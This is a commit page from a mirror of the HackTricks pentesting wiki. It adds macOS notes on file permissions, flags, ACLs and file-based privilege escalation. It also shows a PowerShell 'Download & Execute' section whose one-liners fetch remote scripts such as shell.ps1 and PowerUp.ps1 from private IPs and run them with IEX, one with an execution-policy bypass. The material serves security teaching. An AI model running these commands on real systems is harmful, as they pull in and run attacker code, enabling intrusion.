Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-16 14:08:26 +00:00
Code Issues Projects Releases Packages Wiki Activity

GITBOOK-3958: change request with no subject merged in GitBook

Browse source
This commit is contained in:
CPol 2023-05-29 20:18:06 +00:00 committed by gitbook-bot
parent ffcdd1e35d
commit 2d9f506e60
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
2 changed files with 37 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

36
macos-hardening/macos-security-and-privilege-escalation/README.md
View file

@ -32,6 +32,42 @@ First of all, please note that **most of the tricks about privilege escalation a
## Basic MacOS
### Special File Permissions
#### Folder permissions
In a **folder**, **read** allows to **list it**, **write** allows to **delete** and **write** files on it, and **execute** allows to **traverse** the directory. So, for example, a user with **read permission over a file** inside a directory where he **doesn't have execute** permission **won't be able to read** the file.
#### Flag modifiers
There are some flags that could be set in the files that will make file behave differently. You can **check the flags** of the files inside a directory with `ls -lO /path/directory`
* **`uchg`**: Known as **uchange** flag will **prevent any action** changing or deleting the **file**. To set it do: `chflags uchg file.txt`
* The root user could **remove the flag** and modify the file
* **`restricted`**: This flag makes the file be **protected by SIP** (you cannot add this flag to a file).
* **`Sticky bit`**: If a directory with sticky bit, **only** the **directories owner or root can remane or delete** files. Typically this is set on the /tmp directory to prevent ordinary users from deleting or moving other users files.
#### ACLs
File **ACLs** contain **ACE** (Access Control Entries) where more **granular permissions** can be assigned to different users.
It's possible to grant a **directory** these permissions: `list`, `search`, `add_file`, `add_subdirectory`, `delete_child`, `delete_child`.\
Ans to a **file**: `read`, `write`, `append`, `execute`.
You can see the ACLs of file with `ls -le`: **`ls -le ~/Library`**
#### Privilege Escalation via File permissions
If a **process running as root writes** a file that can be controlled by a user, the user could abuse this to **escalate privileges**.\
This could occur in the following situations:
* File used was already created by a user (owned by the user)
* File used is writable by the user because of a group
* File used is inside a directory owned by the user (the user could create the file)
* File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file)
Being able to **create a file** that is going to be **used by root**, allows a user to **take advantage of its content** or even create **symlinks/hardlinks** to point it to another place.
### OS X Specific Extensions
* **`.dmg`**: Apple Disk Image files are very frequent for installers.

2
windows-hardening/basic-powershell-for-pentesters/README.md
View file

@ -33,7 +33,7 @@ Get-Command -Module <modulename>
## Download & Execute
```powershell
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
g
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3